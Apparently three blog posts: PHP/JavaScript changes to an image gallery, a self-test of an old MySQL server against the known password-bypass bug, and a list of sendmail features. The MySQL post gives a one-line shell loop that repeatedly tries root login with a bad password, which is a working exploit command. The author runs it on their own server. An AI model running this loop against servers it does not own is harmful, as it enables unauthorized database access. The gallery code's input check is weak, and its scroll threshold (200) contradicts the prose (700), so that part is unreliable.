It worked. But there were a couple annoying things. First, the picture order seemed nearly random. Apparently the order reflected the timestamp of the file, but not a sort by name order. I found it was simple to sort them by name, which produced a nice sensible order, by adding:

...
// sensible sort
$sortbool = sort($files,SORT_STRING);
...

to getImages.php.

The other annoying thing was the infinite scroll. Not sure what the attrtaction was to that. Many comments on his post asked how to turn it off. Turns out that was easy:

// prevent annoying infinite scroll
//$response = $response.$files[$i%count($files)].’;’;
$response = $response.$files[$i].’;’;

in the same file.

One astute user noticed the lack of input validation in the argument to GET, which should always be a non-negative integer. So I incorporated his suggestion for argument validation as well.

The full getImages.php file is here:

<?php
// input argument validation - only numbers permitted
function filter($data) {
if(is_numeric($data)) {
  return $data;
}
  else { header("Location: index.html"); }
}
 
        $dir = "thumb";
        if(is_dir($dir)){
                if($dd = opendir($dir)){
                        while (($f = readdir($dd)) !== false)
                                if($f != "." && $f != "..")
                                        $files[] = $f;
                        closedir($dd);
                }
// sensible sort
$sortbool = sort($files,SORT_STRING);
 
 
        $n = filter($_GET["n"]);
        $response = "";
                for($i = $n; $i<$n+12; $i++){
// prevent annoying infinite scroll
                        //$response = $response.$files[$i%count($files)].';';
                        $res = $files[$i];
                        if  (isset($res)) $response = $response.$res.';';
                }
                echo $response;
        }
?>

I’ve only done a couple tests a couple folders but in those tests they both showed all the pictures and then stopped scrolling, as you naturally would want. So that’s why what I have produced is a progressive scroll, not an infinite scroll the useful progressive scrolling part of the original code was preserved.

I think he even used bigger thumbnails than 200 pixels. For these smaller ones it makes more sense to grab pictures 12 at-a-time. So I made a few changes in index.html to take care of that.

Alexandru also had his first nine images hard-coded into his index.html. Again, I don’t see the point in that – makes it a lot harder to generalize. So I chucked that and appropriately modified some offsets, etc, without any terrible side-effects.

Putting it all together that code now looks like this:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, user-scalable=no initial-scale=1.0, minimum-scale=1.0" />
<title>Web Gallery | Progressive Sroll</title>
<link rel="stylesheet" href="style.css" />
</head>
 
<body onload="setInterval('scroll();', 250);">
<div id="header">Web Gallery | Progressive Scroll</div>
<div id="container">
</div>
</body>
</html>
<script>
//var contentHeight = 800;
var contentHeight = document.getElementById('container').offsetHeight;
var pageHeight = document.documentElement.clientHeight;
var scrollPosition;
var n = 0;
var xmlhttp;
 
function putImages(){
 
        if (xmlhttp.readyState==4)
          {
                  if(xmlhttp.responseText){
                         var resp = xmlhttp.responseText.replace("\r\n", "");
                         var files = resp.split(";");
                          var j = 0;
                          for(i=0; i<files.length; i++){
                                  if(files[i] != ""){
                                         document.getElementById("container").innerHTML += '<a href="img/'+files[i]+'"><img
 src="thumb/'+files[i]+'" /></a>';
                                         j++;
 
                                         if(j == 3 || j == 6 || j == 9)
                                                  document.getElementById("container").innerHTML += '<br />';
                                          else if(j == 12){
                                                  document.getElementById("container").innerHTML += '<p>'+(n-1)+" Images Di
splayed | <a href='#header'>top</a></p><br /><hr />";
                                                  j = 0;
                                          }
                                  }
                          }
                          if (i < 12) document.getElementById("container").innerHTML += '<p>'+(n-13+i)+" Images Displayed |
 <a href='#header'>top</a></p><br />";
                  }
          }
}
 
 
function scroll(){
 
        if(navigator.appName == "Microsoft Internet Explorer")
                scrollPosition = document.documentElement.scrollTop;
        else
                scrollPosition = window.pageYOffset;
 
        if((contentHeight - pageHeight - scrollPosition) < 200){
 
                if(window.XMLHttpRequest)
                        xmlhttp = new XMLHttpRequest();
                else
                        if(window.ActiveXObject)
                                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
                        else
                                alert ("Bummer! Your browser does not support XMLHTTP!");
 
                var url="getImages.php?n="+n;
 
                xmlhttp.open("GET",url,true);
                xmlhttp.send();
 
// 12 pictures at a time...
                n += 12;
                xmlhttp.onreadystatechange=putImages;
                contentHeight = document.getElementById('container').offsetHeight;
                //contentHeight += 800;
        }
}
 
</script>

Notice I also played around with the scrolling function because that gave me difficulty. I set the condition contentHeight – pageHeight – scrollPosition to be less than 700, a requirement that is easier to meet, since in my tests I was often getting no scrolling whatsoever.

That’s it!

So to use my improvements you could download the source files from Alexandru’s site, then overwrite getImages.php and index.html from a cut-and-paste from this page.

To do list…
Naturally the first person to try it tried from an Android Smartphone using the Opera browser and it only showed him the first 12 pictures and didn’t do any scrolling. I developed for IE/FF on PC. I’ve just now tried Opera on PC and that worked fine. I’ll have to understand what is happening on Smartphones. So…I learned there is webkit for Smartphone compatibility. I added a meta tag concerning viewport (which I’ve already included in the html source file above). Now the pictures are a little large on my Android browser, and the progressive scrolling takes a nudge to get going, but it basically does work, which is an improvement. But still not on Opera mini! And not that well on Blackberry…

I’d also like to add a folder-browser plug-in.

Conclusion
Pages load fast initially in a progressive scroll approach. So this could be a useful program as a way to display your pictures on your own web site. We fixed up some of the undesirable behaviour of Alexandru’s original version.

Categories
Admin

Mysql Exploit: v. 5.1.6 on CentOS 6 does not appear vulnerable

Intro
As this story makes crystal clear, the test for the mysql password bug is ridiculously simple to run for yourself:

$ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done

More on that
I am at version 5.1.61:

$ mysql –version

I fully expected to get a mysql> prompt from the above exploit code but I did not.

The Amazon cloud has some decent protections in place.

For instance I tried

$ mysql -u root –password=mysecretpassword -h 127.0.0.1 2>/dev/null

and of course I got in. But modified slightly, to

$ mysql -u root –password=mysecretpassword -h drjohnstechtalk.com 2>/dev/null

and it’s a no go. It just hangs. I can’t believe I never did this earlier, but I wanted to see the routing for my own elastic IP:

$ traceroute drjohnstechtalk.com

traceroute to drjohnstechtalk.com (50.17.188.196), 30 hops max, 60 byte packets
 1  ip-10-10-216-2.ec2.internal (10.10.216.2)  0.343 ms  0.506 ms  0.504 ms
 2  ip-10-1-54-93.ec2.internal (10.1.54.93)  0.571 ms ip-10-1-42-93.ec2.internal (10.1.42.93)  0.565 ms ip-10-1-52-93.ec2.internal (10.1.52.93)  0.366 ms
 3  ip-10-1-39-14.ec2.internal (10.1.39.14)  0.457 ms ip-10-1-41-14.ec2.internal (10.1.41.14)  0.515 ms ip-10-1-37-14.ec2.internal (10.1.37.14)  0.605 ms
 4  216.182.224.84 (216.182.224.84)  0.662 ms 216.182.224.86 (216.182.224.86)  0.606 ms  0.608 ms
 5  216.182.232.53 (216.182.232.53)  0.837 ms 216.182.224.89 (216.182.224.89)  0.924 ms 216.182.232.53 (216.182.232.53)  1.030 ms
 6  ip-10-1-41-13.ec2.internal (10.1.41.13)  0.869 ms ip-10-1-39-13.ec2.internal (10.1.39.13)  1.082 ms ip-10-1-43-13.ec2.internal (10.1.43.13)  1.154 ms
 7  ip-10-1-36-94.ec2.internal (10.1.36.94)  1.481 ms ip-10-1-54-94.ec2.internal (10.1.54.94)  1.351 ms ip-10-1-42-94.ec2.internal (10.1.42.94)  1.173 ms
 8  * * *
 9  * * *
10  * * *
...

So there’s quite a few hops before I hit my own IP! That’s plenty of hops in which to insert a firewall, which I suppose they do, to enforce my personal security policy.

My eth0 IP is 10.10.219.96. Using that:

$ mysql -u root –password=mysecretpassword -h 10.10.21.96

I get:

ERROR 1130 (HY000): Host 'ip-10-10-219-96.ec2.internal' is not allowed to connect to this MySQL server

even though my my.cnf file does not have this apparent restriction and the mysql daemon is listening on all interfaces:

$ netstat -an|grep LISTEN

...
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN

Conclusion
I don’t recall taking special steps to secure my msql installation though it’s not out of the question. So I conclude that inspite of the articles that cite my version as being vulnerable, it is not, at least under CentOS 6, and even if it were, it would be especially hard to exploit for an Amazon cloud server.

Categories
Linux

54 Popular sendmail Features

Intro
Thinking of replacing sendmail? Or switching to sendmail? Here are 54 features I find useful in the way I implement sendmail.

In poorly ordered listing, we have:

– minimal acceptable delivery speed: 100 messages/sec
– queue deletion after 3 days (customizable)
– customizable timers on:
– time to wait for initial connection
– time to wait for response to MAIL command
– time to wait for response to QUIT
– time to wait for response to RCPT TO command
– time to wait for response to RSET command
– time to wait for response to other SMTP commands
– ability to turn off identd usage
– customizable greeting
– ability to deliver local mail for error situations such as looping mail, invalid sender + invalid recipient
– ability to detect looping messages and log and remove them
– errors in MIME format
– configurable maximum message size
– configurable maximum number of recipients per message
– configurable minimum queue age before delivery is re-tried
– configurable address operator characters
– ability to set multiple names for this host
– support for alias address transformations
– support for domain aliasing
– configurable load average at which new messages are refused
– configurable load average at which new messages are queued for later delivery
– configurable load average at which SMTP responses are delayed

– ability to run TLS as server and client, and use a CA-issued certificate
– use of fast table lookups to efficiently handle tables with thousands of entries
– configurable mail relaying decisions based on recipient domain
– ability to turn off UUCP routing
– ability to avoid canonification of recipient domain
– ability to re-write sender address
– ability to make mail relaying decisions based on sender address as well as sender domain
– ability to allow only selected domains/IPs/subnets to relay mail
– ability to reject messages to specified recipients/domains with custom message
– ability to silently discard messages to specific recipients/domains
– ability to discard or reject messages from specific senders or sender domains
– ability to set custom error number for rejected email
– support for mass-import and mass alteration of table entries (e.g., to mail routing/access/alias lists)
– ability to restrict mail relaying to all but a positive match list of IP addresses, subnets and FQDNs
– ability to accept unresolvable domains
– ability to run multiple instances, each with independent configuration, with separate IPs, on same appliance
– ability to make mail routing delivery decisions based on recipient domain configurable by MX lookup, set IP address, FQDN with and without MX lookups
– ability to route all else via DNS lookup
– ability to include comments within the configuration
– ability to turn off ESMTP delivery agent to selected domains and act as simple SMTP delivery agent
– ability to send hourly reports
– log available in real time
– log containing at least these fields: sender, recipients, date/time, delay, size, messageId, TLS used flag, sending MTA, relay MTA, reject reason (if applicable)
– ability to analyze logs with RegEx
– ability to archive logs for up to three months
– ability to send test message through itself with customizable subject on periodic basis
– ability to report on queue contents by top sender/recipient/recipient domain
– ability to force delivery retry on selected domain
– ability to set greeting delay for selected IPs and subnets
– ability to run a browser from same IP as used by the MTA

Most, but not all, of these features are in configured in the .mc file. A few are actually reference to external programs I developed. A few rely on the Linux environment that sendmail runs under.

Conclusion
When you sit down and document it, there’s a lot going on in sendmail.